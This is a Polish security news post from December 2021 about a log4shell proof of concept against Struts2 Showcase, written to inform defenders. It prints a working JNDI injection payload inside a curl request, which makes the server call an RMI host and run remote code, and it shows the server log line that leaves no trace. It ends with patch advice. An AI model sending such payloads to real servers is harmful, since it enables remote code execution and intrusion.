Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Popularna biblioteka Struts2 podatna na podatność log4shell. Najnowsza Java, atak w logach nie zostawia śladu…

13 grudnia 2021, 08:50 | W biegu | 0 komentarzy

Badacze zaprezentowali Proof of Concept exploit na Struts2 Showcase (2.5.27) z nową Javą:

root@c9b80b027e02:~# java -version
openjdk version "11.0.13" 2021-10-19
OpenJDK Runtime Environment 18.9 (build 11.0.13+8)
OpenJDK 64-Bit Server VM 18.9 (build 11.0.13+8, mixed mode, sharing)

Atak (uważni dostrzegą, że nie ma tutaj użycia ciągu ldap, jak w klasycznych atakach wykorzystujących log4shell)

wvu@kharak:~$ curl -vso /dev/null http://127.0.0.1:8080/struts2-showcase/token/transfer4.action -d struts.token.name='${jndi:rmi://127.0.0.1:1099/ylbtsl}'

A ramach PoCa tworzony jest np. plik na serwerze:

root@c9b80b027e02:~# ls -l /tmp/vulnerable
-rw-r----- 1 root root 0 Dec 10 22:21 /tmp/vulnerable

W trakcie takiego ataku oczywiście nic podejrzanego nie zostaje w (domyślnych) logach:

172.17.0.1 - - [10/Dec/2021:22:21:39 +0000] "POST /struts2-showcase/token/transfer4.action HTTP/1.1" 200 17976

Autorzy biblioteki jednocześnie ostrzegają:

Pamiętajcie że łatanie jest relatywnie proste (aktualizacja biblioteki log4j do wersji 2.15.0). Więcej szczegółów opisujemy tutaj.

~Michał Sajdak

Spodobał Ci się wpis? Podziel się nim ze znajomymi:



Komentarze

Odpowiedz